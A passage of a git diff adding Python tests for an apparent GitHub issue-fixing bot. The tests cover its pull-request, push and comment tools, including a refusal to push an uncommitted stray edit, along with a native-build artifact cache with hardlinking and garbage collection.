"README.md").write_text("init\n") + for cmd in ( + ["git", "-C", str(seed), "add", "."], + [ + "git", + "-C", + str(seed), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "init", + ], + ["git", "-C", str(seed), "remote", "add", "origin", str(bare)], + ["git", "-C", str(seed), "push", "origin", "main"], + ): + subprocess.run(cmd, check=True, capture_output=True, env=env) + + from robomp.sandbox import SandboxManager + + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=42, + title="fix runs before check", + clone_url=str(bare), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + + # The fake bun: + # `bun run fix` → rewrite src.txt and emit a small marker the test asserts on + # `bun check` → exit 0 + # anything else → fail + fix_calls = tmp_path / "fix-calls" + check_calls = tmp_path / "check-calls" + fakebin = tmp_path / "fakebin" + fakebin.mkdir() + fake_bun = fakebin / "bun" + fake_bun.write_text( + "#!/bin/sh\n" + 'if [ "$1" = "run" ] && [ "$2" = "fix" ]; then\n' + f" printf called >> {fix_calls}\n" + ' printf "formatted\\n" > src.txt\n' + " exit 0\n" + "fi\n" + 'if [ "$1" = "check" ]; then\n' + f" printf called >> {check_calls}\n" + " exit 0\n" + "fi\n" + 'printf "unexpected bun call: %s\\n" "$*" >&2\n' + "exit 2\n" + ) + fake_bun.chmod(0o755) + monkeypatch.setenv("PATH", f"{fakebin}{os.pathsep}{os.environ['PATH']}") + + (ws.repo_dir / "package.json").write_text( + json.dumps({"scripts": {"fix": "...", "check": "..."}}) + "\n", + encoding="utf-8", + ) + (ws.repo_dir / "src.txt").write_text("original\n") + subprocess.run(["git", "-C", str(ws.repo_dir), "add", "package.json", "src.txt"], check=True, capture_output=True) + subprocess.run( + [ + "git", + "-C", + str(ws.repo_dir), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "feat: initial change", + ], + check=True, + capture_output=True, + env=env, + ) + + opened_pr: dict[str, Any] = {} + + def handler(request: httpx.Request) -> httpx.Response: + opened_pr["url"] = str(request.url) + return httpx.Response( + 201, + json={ + "number": 7, + "html_url": "https://github.com/octo/widget/pull/7", + "head": {"ref": ws.branch}, + "base": {"ref": "main"}, + "state": "open", + }, + ) + + github = GitHubClient("tok", transport=httpx.MockTransport(handler)) + loop, thread = _make_loop_in_background() + try: + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=IssueInfo( + repo="octo/widget", + number=42, + title="t", + body="", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ), + workspace=ws, + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + db.upsert_issue( + key=bindings.issue_key, + repo="octo/widget", + number=42, + state="reproducing", + branch=ws.branch, + session_dir=str(ws.session_dir), + ) + tool = next(x for x in build(bindings) if x.name == "gh_open_pr") + body = "## Repro\nrepro\n\n## Cause\ncause\n\n## Fix\nfix\n\n## Verification\nran tests\n\nFixes #42\n" + result = tool.execute({"title": "fix: x", "body": body}, _ctx()) + finally: + _stop_loop(loop, thread) + + # Both bun stages ran, and fix preceded check. + assert fix_calls.read_text() == "called" + assert check_calls.read_text() == "called" + # The formatter diff was committed by the bot as a "style:" commit. + log = subprocess.run( + ["git", "-C", str(ws.repo_dir), "log", "--format=%an|%ae|%s", "-2"], + capture_output=True, + text=True, + check=True, + ) + lines = log.stdout.strip().splitlines() + assert lines[0] == "robomp-bot|robomp-bot@example.invalid|style: bun run fix" + assert lines[1].endswith("|feat: initial change") + # Worktree is clean again (gate before push would have rejected otherwise). + status = subprocess.run( + ["git", "-C", str(ws.repo_dir), "status", "--porcelain"], + capture_output=True, + text=True, + check=True, + ) + assert status.stdout == "" + # The PR actually opened. + assert "opened #7" in result + assert opened_pr["url"].endswith("/repos/octo/widget/pulls") + refs = subprocess.run( + ["git", "-C", str(bare), "for-each-ref", "--format=%(refname)"], + capture_output=True, + text=True, + check=True, + ) + assert f"refs/heads/{ws.branch}" in refs.stdout.splitlines() + + +def test_gh_open_pr_refuses_dirty_worktree_before_fix( + db: Database, tmp_path: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + """A pre-existing uncommitted edit MUST cause gh_open_pr (and gh_push_branch) + to refuse BEFORE `bun run fix` runs — otherwise `git add -A` after fix + would silently fold the unrelated edit into the `style: bun run fix` + commit and ship it in the PR.""" + import os + import subprocess + + bare = tmp_path / "upstream.git" + bare.mkdir() + subprocess.run(["git", "init", "--bare", "--initial-branch=main", str(bare)], check=True, capture_output=True) + seed = tmp_path / "seed" + seed.mkdir() + env = os.environ | { + "GIT_AUTHOR_NAME": "robomp-bot", + "GIT_AUTHOR_EMAIL": "robomp-bot@example.invalid", + "GIT_COMMITTER_NAME": "robomp-bot", + "GIT_COMMITTER_EMAIL": "robomp-bot@example.invalid", + } + subprocess.run(["git", "init", "--initial-branch=main", str(seed)], check=True, capture_output=True) + (seed / "README.md").write_text("init\n") + for cmd in ( + ["git", "-C", str(seed), "add", "."], + [ + "git", + "-C", + str(seed), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "init", + ], + ["git", "-C", str(seed), "remote", "add", "origin", str(bare)], + ["git", "-C", str(seed), "push", "origin", "main"], + ): + subprocess.run(cmd, check=True, capture_output=True, env=env) + + from robomp.sandbox import SandboxManager + + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=42, + title="dirty before fix", + clone_url=str(bare), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + + # `bun run fix` is a no-op; `bun check` would also pass. The bug being + # tested is the staging order, not the formatter's behavior. + fakebin = tmp_path / "fakebin" + fakebin.mkdir() + fake_bun = fakebin / "bun" + fake_bun.write_text("#!/bin/sh\nexit 0\n") + fake_bun.chmod(0o755) + monkeypatch.setenv("PATH", f"{fakebin}{os.pathsep}{os.environ['PATH']}") + + # Commit a clean package.json + tracked source; then leave an UNRELATED + # uncommitted edit sitting in the worktree (the kind of thing the agent + # forgot to commit). + (ws.repo_dir / "package.json").write_text( + json.dumps({"scripts": {"fix": "...", "check": "..."}}) + "\n", + encoding="utf-8", + ) + (ws.repo_dir / "src.txt").write_text("clean\n") + subprocess.run( + ["git", "-C", str(ws.repo_dir), "add", "package.json", "src.txt"], + check=True, + capture_output=True, + ) + subprocess.run( + [ + "git", + "-C", + str(ws.repo_dir), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "feat: committed work", + ], + check=True, + capture_output=True, + env=env, + ) + head_before = subprocess.run( + ["git", "-C", str(ws.repo_dir), "rev-parse", "HEAD"], + capture_output=True, + text=True, + check=True, + ).stdout.strip() + # Now plant the stowaway edit that the agent forgot. + (ws.repo_dir / "src.txt").write_text("STOWAWAY uncommitted edit\n") + + github = GitHubClient("tok", transport=httpx.MockTransport(lambda r: httpx.Response(500))) + loop, thread = _make_loop_in_background() + try: + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=IssueInfo( + repo="octo/widget", + number=42, + title="t", + body="", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ), + workspace=ws, + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + db.upsert_issue( + key=bindings.issue_key, + repo="octo/widget", + number=42, + state="reproducing", + branch=ws.branch, + session_dir=str(ws.session_dir), + ) + push_tool = next(x for x in build(bindings) if x.name == "gh_push_branch") + with pytest.raises(RpcCommandError) as exc: + push_tool.execute({}, _ctx()) + assert "dirty worktree" in str(exc.value).lower() + + pr_tool = next(x for x in build(bindings) if x.name == "gh_open_pr") + body = "## Repro\nr\n\n## Cause\nc\n\n## Fix\nf\n\n## Verification\nv\n\nFixes #42\n" + with pytest.raises(RpcCommandError) as exc2: + pr_tool.execute({"title": "fix: x", "body": body}, _ctx()) + assert "dirty worktree" in str(exc2.value).lower() + finally: + _stop_loop(loop, thread) + + # HEAD is unchanged: the unrelated edit was NEVER committed. + head_after = subprocess.run( + ["git", "-C", str(ws.repo_dir), "rev-parse", "HEAD"], + capture_output=True, + text=True, + check=True, + ).stdout.strip() + assert head_after == head_before + # The stowaway edit is still sitting uncommitted in the worktree. + status = subprocess.run( + ["git", "-C", str(ws.repo_dir), "status", "--porcelain"], + capture_output=True, + text=True, + check=True, + ) + assert "src.txt" in status.stdout + # No commit named "style: bun run fix" exists. + log = subprocess.run( + ["git", "-C", str(ws.repo_dir), "log", "--format=%s"], + capture_output=True, + text=True, + check=True, + ) + assert "style: bun run fix" not in log.stdout + # Origin's farm/* branch was never created — push refused before reaching the network. + refs = subprocess.run( + ["git", "-C", str(bare), "for-each-ref", "--format=%(refname)"], + capture_output=True, + text=True, + check=True, + ) + assert not any(r.startswith("refs/heads/farm/") for r in refs.stdout.splitlines()) + + +def test_gh_open_pr_skips_fix_when_no_script(db: Database, tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: + """No `scripts.fix` entry → fix stage is a no-op even if `scripts.check` exists.""" + import os + import subprocess + + bare = tmp_path / "upstream.git" + bare.mkdir() + subprocess.run(["git", "init", "--bare", "--initial-branch=main", str(bare)], check=True, capture_output=True) + seed = tmp_path / "seed" + seed.mkdir() + env = os.environ | { + "GIT_AUTHOR_NAME": "robomp-bot", + "GIT_AUTHOR_EMAIL": "robomp-bot@example.invalid", + "GIT_COMMITTER_NAME": "robomp-bot", + "GIT_COMMITTER_EMAIL": "robomp-bot@example.invalid", + } + subprocess.run(["git", "init", "--initial-branch=main", str(seed)], check=True, capture_output=True) + (seed / "README.md").write_text("init\n") + for cmd in ( + ["git", "-C", str(seed), "add", "."], + [ + "git", + "-C", + str(seed), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "init", + ], + ["git", "-C", str(seed), "remote", "add", "origin", str(bare)], + ["git", "-C", str(seed), "push", "origin", "main"], + ): + subprocess.run(cmd, check=True, capture_output=True, env=env) + + from robomp.sandbox import SandboxManager + + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=42, + title="no fix script", + clone_url=str(bare), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + + fix_calls = tmp_path / "fix-calls" + check_calls = tmp_path / "check-calls" + fakebin = tmp_path / "fakebin" + fakebin.mkdir() + fake_bun = fakebin / "bun" + fake_bun.write_text( + "#!/bin/sh\n" + 'if [ "$1" = "run" ] && [ "$2" = "fix" ]; then\n' + f" printf called >> {fix_calls}\n" + " exit 0\n" + "fi\n" + 'if [ "$1" = "check" ]; then\n' + f" printf called >> {check_calls}\n" + " exit 0\n" + "fi\n" + "exit 2\n" + ) + fake_bun.chmod(0o755) + monkeypatch.setenv("PATH", f"{fakebin}{os.pathsep}{os.environ['PATH']}") + + (ws.repo_dir / "package.json").write_text( + json.dumps({"scripts": {"check": "..."}}) + "\n", + encoding="utf-8", + ) + subprocess.run(["git", "-C", str(ws.repo_dir), "add", "package.json"], check=True, capture_output=True) + subprocess.run( + [ + "git", + "-C", + str(ws.repo_dir), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "feat: x", + ], + check=True, + capture_output=True, + env=env, + ) + + def handler(_request: httpx.Request) -> httpx.Response: + return httpx.Response( + 201, + json={ + "number": 7, + "html_url": "https://github.com/octo/widget/pull/7", + "head": {"ref": ws.branch}, + "base": {"ref": "main"}, + "state": "open", + }, + ) + + github = GitHubClient("tok", transport=httpx.MockTransport(handler)) + loop, thread = _make_loop_in_background() + try: + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=IssueInfo( + repo="octo/widget", + number=42, + title="t", + body="", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ), + workspace=ws, + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + db.upsert_issue( + key=bindings.issue_key, + repo="octo/widget", + number=42, + state="reproducing", + branch=ws.branch, + session_dir=str(ws.session_dir), + ) + tool = next(x for x in build(bindings) if x.name == "gh_open_pr") + body = "## Repro\nrepro\n\n## Cause\ncause\n\n## Fix\nfix\n\n## Verification\nran tests\n\nFixes #42\n" + result = tool.execute({"title": "fix: x", "body": body}, _ctx()) + finally: + _stop_loop(loop, thread) + + assert not fix_calls.exists() + assert check_calls.read_text() == "called" + assert "opened #7" in result + + +# -------- gh_post_comment + question auto-close --------------------------- + + +def _stub_settings(*, enabled: bool = True, hours: float = 4.0): + """Construct a Settings stub with question_autoclose knobs only. + + `model_construct` skips field validation, which lets us avoid wiring up + every required env var just to set the autoclose fields a test needs. + """ + from pydantic import SecretStr + + from robomp.config import Settings + + return Settings.model_construct( + github_token=None, + github_webhook_secret=SecretStr("x"), + bot_login="robomp-bot", + git_author_email="bot@example.invalid", + repo_allowlist_raw="octo/widget", + gh_proxy_url="http://proxy.invalid", + gh_proxy_hmac_key=SecretStr("k" * 32), + question_autoclose_enabled=enabled, + question_autoclose_hours=hours, + question_autoclose_scan_seconds=60.0, + ) + + +def _question_handler(captured: dict[str, Any]): + def handler(request: httpx.Request) -> httpx.Response: + captured["url"] = str(request.url) + captured["body"] = json.loads(request.content) + return httpx.Response( + 201, + json={"id": 4242, "user": {"login": "robomp-bot"}, "body": "x", "created_at": "t"}, + ) + + return handler + + +def test_gh_post_comment_appends_suffix_and_schedules_for_question(db: Database, tmp_path: Path) -> None: + captured: dict[str, Any] = {} + transport = httpx.MockTransport(_question_handler(captured)) + bindings, loop, t = _bindings(db, tmp_path, transport) + db.set_issue_classification(bindings.issue_key, "question") + bindings = ToolBindings( + db=bindings.db, + github=bindings.github, + git_transport=bindings.git_transport, + repo=bindings.repo, + issue=bindings.issue, + workspace=bindings.workspace, + loop=bindings.loop, + author_name=bindings.author_name, + author_email=bindings.author_email, + settings=_stub_settings(), + ) + try: + tool = next(x for x in build(bindings) if x.name == "gh_post_comment") + tool.execute({"body": "Here's the answer"}, _ctx()) + finally: + _stop_loop(loop, t) + + body = captured["body"]["body"] + assert body.startswith("Here's the answer") + # Suffix appended exactly once. + assert body.count("react 👎") == 1 + assert "auto-close in 4 hours" in body + row = db.get_pending_closure(bindings.issue_key) + assert row is not None + assert row.state == "pending" + assert row.comment_id == 4242 + # `_stub_issue()` opens the issue as `alice`. + assert row.issue_author == "alice" + + +def test_gh_post_comment_skips_suffix_for_non_question(db: Database, tmp_path: Path) -> None: + captured: dict[str, Any] = {} + transport = httpx.MockTransport(_question_handler(captured)) + bindings, loop, t = _bindings(db, tmp_path, transport) + db.set_issue_classification(bindings.issue_key, "bug") + bindings = ToolBindings( + db=bindings.db, + github=bindings.github, + git_transport=bindings.git_transport, + repo=bindings.repo, + issue=bindings.issue, + workspace=bindings.workspace, + loop=bindings.loop, + author_name=bindings.author_name, + author_email=bindings.author_email, + settings=_stub_settings(), + ) + try: + tool = next(x for x in build(bindings) if x.name == "gh_post_comment") + tool.execute({"body": "Here's the diagnosis"}, _ctx()) + finally: + _stop_loop(loop, t) + + assert captured["body"] == {"body": "Here's the diagnosis"} + assert db.get_pending_closure(bindings.issue_key) is None + + +def test_gh_post_comment_skips_suffix_when_target_differs_from_origin(db: Database, tmp_path: Path) -> None: + """Posting to a different `number` (e.g. cross-issue reply) must not schedule.""" + captured: dict[str, Any] = {} + transport = httpx.MockTransport(_question_handler(captured)) + bindings, loop, t = _bindings(db, tmp_path, transport) + db.set_issue_classification(bindings.issue_key, "question") + bindings = ToolBindings( + db=bindings.db, + github=bindings.github, + git_transport=bindings.git_transport, + repo=bindings.repo, + issue=bindings.issue, + workspace=bindings.workspace, + loop=bindings.loop, + author_name=bindings.author_name, + author_email=bindings.author_email, + settings=_stub_settings(), + ) + try: + tool = next(x for x in build(bindings) if x.name == "gh_post_comment") + tool.execute({"body": "see other issue", "number": 99}, _ctx()) + finally: + _stop_loop(loop, t) + + assert captured["body"] == {"body": "see other issue"} + assert db.get_pending_closure(bindings.issue_key) is None + + +def test_gh_post_comment_skips_suffix_when_feature_disabled(db: Database, tmp_path: Path) -> None: + captured: dict[str, Any] = {} + transport = httpx.MockTransport(_question_handler(captured)) + bindings, loop, t = _bindings(db, tmp_path, transport) + db.set_issue_classification(bindings.issue_key, "question") + bindings = ToolBindings( + db=bindings.db, + github=bindings.github, + git_transport=bindings.git_transport, + repo=bindings.repo, + issue=bindings.issue, + workspace=bindings.workspace, + loop=bindings.loop, + author_name=bindings.author_name, + author_email=bindings.author_email, + settings=_stub_settings(enabled=False), + ) + try: + tool = next(x for x in build(bindings) if x.name == "gh_post_comment") + tool.execute({"body": "Here's the answer"}, _ctx()) + finally: + _stop_loop(loop, t) + + assert captured["body"] == {"body": "Here's the answer"} + assert db.get_pending_closure(bindings.issue_key) is None diff --git a/python/robomp/tests/test_natives_cache.py b/python/robomp/tests/test_natives_cache.py new file mode 100644 index 000000000..534c830a6 --- /dev/null +++ b/python/robomp/tests/test_natives_cache.py @@ -0,0 +1,414 @@ +"""Unit tests for `robomp.natives_cache`. + +The module's filesystem operations (hardlink, atomic rename, flock) are +exercised against `tmp_path`; nothing here requires a running orchestrator. +""" + +from __future__ import annotations + +import errno +import json +import os +import subprocess +import threading +import time +from pathlib import Path + +import pytest + +from robomp.natives_cache import ( + CACHE_KEY_PATHS, + NativesCache, + _atomic_link, + compute_key, +) + +REPO = "octo/widget" + + +# ---- repo + workspace fixtures ---- + + +def _git(args: list[str], cwd: Path) -> None: + subprocess.run( + ["git", *args], + cwd=str(cwd), + check=True, + capture_output=True, + text=True, + env=os.environ + | { + "GIT_AUTHOR_NAME": "t", + "GIT_AUTHOR_EMAIL": "t@t", + "GIT_COMMITTER_NAME": "t", + "GIT_COMMITTER_EMAIL": "t@t", + }, + ) + + +def _seed_repo(root: Path, *, with_all_inputs: bool = True) -> Path: + """Stand up a minimal repo with the cache-key inputs present. + + When `with_all_inputs=False`, only `Cargo.lock` exists — used to exercise + the missing-path code path in `compute_key`. + """ + root.mkdir(parents=True, exist_ok=True) + _git(["init", "--initial-branch=main", str(root)], cwd=root.parent) + (root / "Cargo.lock").write_text("# lock v1\n") + if with_all_inputs: + (root / "Cargo.toml").write_text("[workspace]\nmembers = ['crates/*']\n") + (root / "rust-toolchain.toml").write_text('[toolchain]\nchannel = "1.85.0"\n') + crates = root / "crates" / "pi-natives" + crates.mkdir(parents=True) + (crates / "Cargo.toml").write_text('[package]\nname = "pi-natives"\n') + (crates / "src.rs").write_text("// source\n") + natives = root / "packages" / "natives" + natives.mkdir(parents=True) + (natives / "package.json").write_text('{"name":"@oh-my-pi/pi-natives"}\n') + scripts = natives / "scripts" + scripts.mkdir() + (scripts / "build-native.ts").write_text("// build script\n") + native_dir = natives / "native" + native_dir.mkdir() + (native_dir / "index.d.ts").write_text("// initial typings\n") + _git(["-C", str(root), "add", "."], cwd=root.parent) + _git(["-C", str(root), "commit", "-m", "init"], cwd=root.parent) + return root + + +def _populate_built_artifacts(repo_dir: Path, *, body: bytes = b"\x7fELF...native") -> Path: + """Fill `packages/natives/native/` with a complete built-artifact set.""" + native_dir = repo_dir / "packages" / "natives" / "native" + native_dir.mkdir(parents=True, exist_ok=True) + (native_dir / "pi_natives.linux-arm64.node").write_bytes(body) + (native_dir / "index.d.ts").write_text("export const X: number;\n") + (native_dir / "index.js").write_text("export const X = 1;\n") + (native_dir / "embedded-addon.js").write_text("export const embeddedAddon = null;\n") + return native_dir + + +# ---- compute_key ---- + + +def test_compute_key_deterministic_across_clones(tmp_path: Path) -> None: + a = _seed_repo(tmp_path / "a") + b_root = tmp_path / "b" + subprocess.run(["git", "clone", str(a), str(b_root)], check=True, capture_output=True, text=True) + key_a = compute_key(a, target="linux-arm64") + key_b = compute_key(b_root, target="linux-arm64") + assert key_a == key_b + + +def test_compute_key_changes_when_each_input_changes(tmp_path: Path) -> None: + base = _seed_repo(tmp_path / "base") + base_key = compute_key(base, target="linux-arm64") + + # Touching a file under each key path must shift the key. + mutations: dict[str, tuple[str, str]] = { + "crates": ("crates/pi-natives/src.rs", "// new comment\n"), + "Cargo.lock": ("Cargo.lock", "# lock v2\n"), + "Cargo.toml": ("Cargo.toml", "[workspace]\nmembers = ['crates/*', 'extra']\n"), + "rust-toolchain.toml": ("rust-toolchain.toml", '[toolchain]\nchannel = "1.86.0"\n'), + "packages/natives": ("packages/natives/scripts/build-native.ts", "// edited\n"), + } + for label, (rel, body) in mutations.items(): + clone = tmp_path / f"clone-{label.replace('/', '-')}" + subprocess.run( + ["git", "clone", str(base), str(clone)], + check=True, + capture_output=True, + text=True, + ) + target = clone / rel + target.parent.mkdir(parents=True, exist_ok=True) + target.write_text(body) + _git(["-C", str(clone), "add", "."], cwd=clone.parent) + _git(["-C", str(clone), "commit", "-m", f"mutate {label}"], cwd=clone.parent) + new_key = compute_key(clone, target="linux-arm64") + assert new_key != base_key, f"key did not change after mutating {label}" + + +def test_compute_key_target_triple_changes_key(tmp_path: Path) -> None: + repo = _seed_repo(tmp_path / "repo") + arm = compute_key(repo, target="linux-arm64") + x64 = compute_key(repo, target="linux-x64-modern") + assert arm != x64 + + +def test_compute_key_handles_missing_inputs(tmp_path: Path) -> None: + """Missing key paths fold to a fixed null hash → key still deterministic.""" + repo = _seed_repo(tmp_path / "repo", with_all_inputs=False) + # Lock-only repo: should compute without error, and adding a tracked + # crates/ subtree shifts the key. + key_before = compute_key(repo, target="linux-arm64") + crates = repo / "crates" / "pi-natives" + crates.mkdir(parents=True) + (crates / "lib.rs").write_text("// new\n") + _git(["-C", str(repo), "add", "."], cwd=repo.parent) + _git(["-C", str(repo), "commit", "-m", "add crates"], cwd=repo.parent) + key_after = compute_key(repo, target="linux-arm64") + assert key_before != key_after + + +def test_compute_key_uses_all_documented_paths() -> None: + # Sanity contract: the exported path list IS the input set. + assert CACHE_KEY_PATHS == ( + "crates", + "Cargo.lock", + "Cargo.toml", + "rust-toolchain.toml", + "packages/natives", + ) + + +def test_compute_key_raises_on_non_repo(tmp_path: Path) -> None: + with pytest.raises(subprocess.CalledProcessError): + compute_key(tmp_path, target="linux-arm64") + + +# ---- populate / capture ---- + + +def _cache(tmp_path: Path, **kwargs: object) -> NativesCache: + return NativesCache(tmp_path / "natives-cache", **kwargs) # type: ignore[arg-type] + + +def test_populate_workspace_miss_is_noop(tmp_path: Path) -> None: + cache = _cache(tmp_path) + repo_dir = _seed_repo(tmp_path / "ws" / "repo") + native_dir = repo_dir / "packages" / "natives" / "native" + before = sorted(p.name for p in native_dir.iterdir()) + hit = cache.populate_workspace(REPO, "deadbeef" * 8, native_dir) + after = sorted(p.name for p in native_dir.iterdir()) + assert hit is None + assert before == after + + +def test_capture_then_populate_shares_node_inode_but_copies_companions(tmp_path: Path) -> None: + cache = _cache(tmp_path) + src_repo = _seed_repo(tmp_path / "src" / "repo") + native_dir = _populate_built_artifacts(src_repo) + key = compute_key(src_repo, target="linux-arm64") + stored = cache.capture(REPO, key, native_dir, source_workspace="src__001") + assert stored is not None + manifest = json.loads((stored / "manifest.json").read_text()) + assert manifest["key"] == key + assert "pi_natives.linux-arm64.node" in manifest["node_files"] + + # Populate a fresh workspace from the same source state. + dst_repo = src_repo.parent.parent / "dst" / "repo" + dst_repo.mkdir(parents=True) + _git(["clone", str(src_repo), str(dst_repo)], cwd=dst_repo.parent) + dst_native = dst_repo / "packages" / "natives" / "native" + dst_native.mkdir(parents=True, exist_ok=True) + hit = cache.populate_workspace(REPO, key, dst_native) + assert hit is not None + assert {p.name for p in hit.files} >= { + "pi_natives.linux-arm64.node", + "index.d.ts", + "index.js", + "embedded-addon.js", + } + # The `.node` is hardlinked: same inode, nlink ≥ 2. + cached_node = stored / "pi_natives.linux-arm64.node" + workspace_node = dst_native / "pi_natives.linux-arm64.node" + assert cached_node.stat().st_ino == workspace_node.stat().st_ino + assert cached_node.stat().st_nlink >= 2 + # Companions are COPIED (independent inodes): in-place rewrite in the + # workspace (gen-enums.ts / installGeneratedBindings open-truncate-write) + # MUST NOT mutate the cached copy. + for name in ("index.d.ts", "index.js", "embedded-addon.js"): + cached_companion = stored / name + ws_companion = dst_native / name + assert cached_companion.stat().st_ino != ws_companion.stat().st_ino, name + original = cached_companion.read_text() + ws_companion.write_text("rewritten\n") + assert cached_companion.read_text() == original, name + + +def test_capture_skips_when_artifacts_incomplete(tmp_path: Path) -> None: + cache = _cache(tmp_path) + repo = _seed_repo(tmp_path / "ws" / "repo") + native_dir = repo / "packages" / "natives" / "native" + # Only the .node — missing companions → capture refuses. + (native_dir / "pi_natives.linux-arm64.node").write_bytes(b"x") + assert cache.capture(REPO, "k", native_dir) is None + # And no entry was created. + assert not cache.entry_dir(REPO, "k").exists() + + +def test_capture_is_idempotent_under_lock(tmp_path: Path) -> None: + """Two concurrent captures of the same key end with one final entry.""" + cache = _cache(tmp_path) + src_repo = _seed_repo(tmp_path / "src" / "repo") + _populate_built_artifacts(src_repo) + key = compute_key(src_repo, target="linux-arm64") + native_dir = src_repo / "packages" / "natives" / "native" + + results: list[Path | None] = [] + barrier = threading.Barrier(2) + + def run() -> None: + barrier.wait() + results.append(cache.capture(REPO, key, native_dir)) + + threads = [threading.Thread(target=run) for _ in range(2)] + for t in threads: + t.start() + for t in threads: + t.join() + # Both calls succeed (one captures, the other recognizes the entry). + assert all(isinstance(r, Path) for r in results) + # Exactly one final entry directory (no leftover staging). + repo_root = cache.repo_root(REPO) + final_dirs = [p for p in repo_root.iterdir() if p.is_dir() and not p.name.startswith(".")] + assert len(final_dirs) == 1 + assert final_dirs[0].name == key + + +def test_populate_cross_device_falls_back_to_copy(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: + cache = _cache(tmp_path) + src_repo = _seed_repo(tmp_path / "src" / "repo") + _populate_built_artifacts(src_repo) + key = compute_key(src_repo, target="linux-arm64") + cache.capture(REPO, key, src_repo / "packages" / "natives" / "native") + + dst_native = tmp_path / "ws2" / "packages" / "natives" / "native" + dst_native.mkdir(parents=True) + + # Simulate cross-device hardlink failure for every os.link call. + real_link = os.link + + def fake_link(src, dst, *args, **kwargs): # type: ignore[no-untyped-def] + raise OSError(errno.EXDEV, "Cross-device link", str(src)) + + monkeypatch.setattr(os, "link", fake_link) + try: + hit = cache.populate_workspace(REPO, key, dst_native) + finally: + monkeypatch.setattr(os, "link", real_link) + assert hit is not None + # Files exist (via copy) but are distinct inodes from the cache. + cached_node = cache.entry_dir(REPO, key) / "pi_natives.linux-arm64.node" + copied_node = dst_native / "pi_natives.linux-arm64.node" + assert copied_node.exists() + assert cached_node.stat().st_ino != copied_node.stat().st_ino + + +def test_populate_replaces_existing_file_atomically(tmp_path: Path) -> None: + cache = _cache(tmp_path) + src_repo = _seed_repo(tmp_path / "src" / "repo") + _populate_built_artifacts(src_repo, body=b"\x7fELF.A") + key = compute_key(src_repo, target="linux-arm64") + cache.capture(REPO, key, src_repo / "packages" / "natives" / "native") + + dst_native = tmp_path / "dst" / "packages" / "natives" / "native" + dst_native.mkdir(parents=True) + # Pre-existing stub bytes — populate must replace, not append/error. + target = dst_native / "pi_natives.linux-arm64.node" + target.write_bytes(b"old-stub") + hit = cache.populate_workspace(REPO, key, dst_native) + assert hit is not None + assert target.read_bytes() == b"\x7fELF.A" + + +# ---- gc ---- + + +def _stamp_entry(cache: NativesCache, repo: str, key: str, captured_at: float) -> Path: + entry = cache.entry_dir(repo, key) + entry.mkdir(parents=True, exist_ok=True) + (entry / "pi_natives.linux-arm64.node").write_bytes(b"x" * 1024) + (entry / "index.d.ts").write_text("") + (entry / "index.js").write_text("") + (entry / "embedded-addon.js").write_text("") + (entry / "manifest.json").write_text( + json.dumps({"key": key, "captured_at": captured_at, "node_files": ["pi_natives.linux-arm64.node"]}) + ) + return entry + + +def test_gc_evicts_oldest_beyond_entry_cap(tmp_path: Path) -> None: + cache = _cache(tmp_path, max_entries_per_repo=2, max_bytes=0) + now = time.time() + _stamp_entry(cache, REPO, "k1", now - 300) + _stamp_entry(cache, REPO, "k2", now - 200) + _stamp_entry(cache, REPO, "k3", now - 100) + evicted = cache.gc(REPO) + assert evicted == 1 + remaining = {p.name for p in cache.repo_root(REPO).iterdir() if p.is_dir() and not p.name.startswith(".")} + assert remaining == {"k2", "k3"} + + +def test_gc_evicts_for_byte_cap(tmp_path: Path) -> None: + cache = _cache(tmp_path, max_entries_per_repo=8, max_bytes=2500) + now = time.time() + # Each entry weighs ~1024 bytes (the .node); 3 entries → ~3072 bytes > cap. + _stamp_entry(cache, REPO, "k1", now - 300) + _stamp_entry(cache, REPO, "k2", now - 200) + _stamp_entry(cache, REPO, "k3", now - 100) + cache.gc(REPO) + remaining = {p.name for p in cache.repo_root(REPO).iterdir() if p.is_dir() and not p.name.startswith(".")} + # Oldest evicted; at least one survives. + assert "k1" not in remaining + assert remaining <= {"k2", "k3"} + assert remaining + + +def test_gc_preserves_workspace_hardlinks(tmp_path: Path) -> None: + """Evicting a cache entry must NOT delete the file from workspaces that + hardlinked it — kernel inode refcount keeps the data alive.""" + cache = _cache(tmp_path, max_entries_per_repo=1, max_bytes=0) + now = time.time() + entry = _stamp_entry(cache, REPO, "k1", now - 500) + _stamp_entry(cache, REPO, "k2", now - 100) + # Workspace hardlinks the older entry's .node before GC runs. + ws_node = tmp_path / "ws" / "pi_natives.linux-arm64.node" + ws_node.parent.mkdir(parents=True) + os.link(entry / "pi_natives.linux-arm64.node", ws_node) + cache.gc(REPO) + assert not entry.exists() # cache directory swept + assert ws_node.exists() # workspace file survives via inode refcount + assert 